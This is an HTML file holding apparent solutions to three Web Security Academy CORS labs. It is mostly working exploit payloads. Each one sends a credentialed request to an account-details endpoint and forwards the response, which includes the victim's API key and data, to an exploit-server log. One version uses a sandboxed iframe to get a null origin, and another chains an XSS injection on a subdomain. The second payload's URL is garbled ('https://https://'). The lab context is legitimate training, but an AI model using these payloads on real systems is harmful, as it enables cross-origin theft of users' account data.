<!-- answer for the same cors origin 1-->

<script>

    var req = new XMLHttpRequest();
    
    req.onload = reqListener;
    
    req.open('get','https://0a0b00d9046c4736c4e8fe4e002600cd.web-security-academy.net/accountDetails',true);
    
    req.withCredentials = true;
    
    req.send();
    
    function reqListener() {
    
        location='/log?key='+this.responseText;
    
    };
    
    </script>
    
    
    
    
    
    
    
    <!-- answer for the same cors origin 2, Note here we are using sandbox to make a request as a null website, To get admins data we need to write allow-scripts -->
    
    <!-- srcdoc is where you can store html,css and javascript elements-->
    
    <iframe sandbox="allow-scripts" srcdoc="<script>
        var req = new XMLHttpRequest();
    
        req.onload = reqListener;
    
        req.open('get','https://0a0b00d9046c4736c4e8fe4e002600cd.web-security-academy.net/accountDetails',true);
    
        req.withCredentials = true;
    
        req.send();
    
        function reqListener() {
    
            location='https://https://exploit-0abe00480465b4f98575d9c901ca0051.exploit-server.net/log?key='+this.responseText;
    
        };
        </script>"></iframe>
    
    
    
    
    
    <!-- answer for the same cors origin 3, Note that searching the website we can find a address that the website accpets data from, Then trying to see if that website is effected by XSS.  -->
    
    <!-- After all that in the place where XSS is effected we construct the XMLHttpRequest. -->
    
    <script>
        document.location="http://stock.0ac1005504d8b4e1859bdaa500d600fc.web-security-academy.net/?productId=<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ac1005504d8b4e1859bdaa500d600fc.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0abe00480465b4f98575d9c901ca0051.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
    </script>
    